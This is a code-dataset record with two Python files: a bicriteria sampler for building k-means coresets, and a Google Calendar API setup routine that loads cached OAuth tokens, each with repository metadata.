818adc00a072ee6dd78744da0ba69c4801f939cf | fade4e5eb42c54a5fc89090740eafb8fd757a309 | /spark_coreset-master/k_means_coreset/old_version_garbage/bicriteria.py | c5b96e18075884a5f75f2a83e521464339cb6ba3 | [] | no_license | vkhakham/k-segment | 6e7d8a6e49388338fcd6b1ec81f255bb93cfef40 | 0527a19e172f428381681fc9e1dd6c0aeb48d597 | refs/heads/master | 2020-04-06T05:55:45.469433 | 2017-08-18T09:30:24 | 2017-08-18T09:30:24 | 51,445,147 | 0 | 4 | null | 2019-05-17T22:57:26 | 2016-02-10T14:14:09 | Python | UTF-8 | Python | false | false | 1,939 | py | #!/usr/bin/env python
__author__ = 'Anton'
import utils
import numpy as np
class Bicriteria(object):
    """Bicriteria approximation sampler used for k-means coreset construction.

    p: input points (array-like), w: per-point weights, m: sample size
    drawn per round.
    """
    def __init__(self, p, w, m):
        # Keep references to the points, weights and per-round sample size.
        self.p = p
        self.w = w
        self.m = m
    #TODO: fix this to work with weights
    def drop_half_points(self, points, weights, M):
        """Keep only points whose distance to the centers M exceeds the median.

        NOTE(review): this keeps the FAR half (d > median), i.e. it drops
        the half of the points closest to the sampled centers.
        """
        d = utils.get_dist_to_centers(points, M)
        median = np.median(d)
        points = points[d>median]
        if weights is not None:
            weights = weights[d>median]
        return points, weights
    def drop_half_weighted_points(self, points, weights, M, W):
        """Remove a total of W weight from the points closest to the centers M.

        Points are consumed in order of increasing distance to M; the last
        point touched may be only partially consumed (it is kept with its
        remaining weight).
        NOTE(review): assumes sum(weights) >= W; otherwise the while loop
        indexes past the end of idx -- TODO confirm callers guarantee this.
        """
        left = W
        points_to_drop=[]
        d = utils.get_dist_to_centers(points, M)
        idx = np.argsort(d)
        i = 0
        while left > 0:
            index = idx[i]
            if weights[index] > left:
                # Partially consume this point's weight and stop.
                weights[index] -= left
                left = 0
            else:
                # Fully consume this point and mark it for removal.
                left -= weights[index]
                points_to_drop.append(index)
            i += 1
        points = np.delete(points,points_to_drop,axis=0)
        weights = np.delete(weights,points_to_drop)
        return points, weights
    def compute(self):
        """Repeatedly sample m weighted points and halve the remaining weight.

        Returns (bi, wi): the accumulated sampled points and their weights
        (None, None is never returned unless the loop body never runs).
        """
        bi = None
        wi = None
        points = self.p
        weights = np.array(self.w)
        W = np.sum(weights) / 2 # I should drop half of weight
        while W > self.m:
            prob = weights*1.0 / np.sum(weights) #Sums to 1
            M, w = utils.sample(points, prob, self.m, self.w) #sample points
            #if-else to concatane points to current dataset
            if bi is None:
                bi = M
                wi = w
            else:
                bi = np.vstack((bi,M))
                wi = np.hstack((wi,w))
            # Remove W total weight from the points nearest the new centers.
            points, weights = self.drop_half_weighted_points(points, weights, M, W)
            if points.shape[0] < self.m:
                break
            W = np.sum(weights) / 2
            W = int(W) #TODO: is that good?
        return bi,wi
| [
"mikijoy@gmail.com"
] | mikijoy@gmail.com |
6e9e8a414373f3d05d8972dd99df84c0cd3424dc | 80519f952abe14a8226b58ca9bc8062237a45f01 | /cal_setup.py | 30bfab9d87a3309436a96469f16f67c680cb1169 | [] | no_license | vasyllyashkevych/py-google-calendar | afb486a3ab1aaa73222f0ff3f4d348130e158cae | c77b7f3085270c09b2da3068469fa97976cdfe8a | refs/heads/main | 2023-03-31T16:57:43.708860 | 2021-04-05T19:50:13 | 2021-04-05T19:50:13 | 353,659,431 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/calendar']
# SCOPES = ['https://www.googleapis.com/auth/calendar.readonly']
# OAuth client secrets file downloaded from the Google Cloud console.
CREDENTIALS_FILE = 'client_secrets.json'
def get_calendar_service():
    """Return an authorized Google Calendar v3 service client.

    Loads cached credentials from token.pickle when present; otherwise
    refreshes an expired token or runs the local OAuth flow. Newly obtained
    credentials are NOT persisted -- the save block below is deliberately
    commented out, matching the original behavior.
    """
    creds = None
    # token.pickle stores the user's access and refresh tokens; it is created
    # automatically when the authorization flow completes for the first time.
    if os.path.exists('token.pickle'):
        with open('token.pickle', 'rb') as token:
            creds = pickle.load(token)
    if creds and creds.valid:
        # Cached credentials are still good; no user interaction required.
        return build('calendar', 'v3', credentials=creds)
    if creds and creds.expired and creds.refresh_token:
        creds.refresh(Request())
    else:
        flow = InstalledAppFlow.from_client_secrets_file(
            CREDENTIALS_FILE, SCOPES)
        creds = flow.run_local_server(port=0)
    # Save the credentials for the next run
    # with open('token.pickle', 'wb') as token:
    #     pickle.dump(creds, token)
    return build('calendar', 'v3', credentials=creds)
| [
"vasyllyashkevych@gmail.com"
] | vasyllyashkevych@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.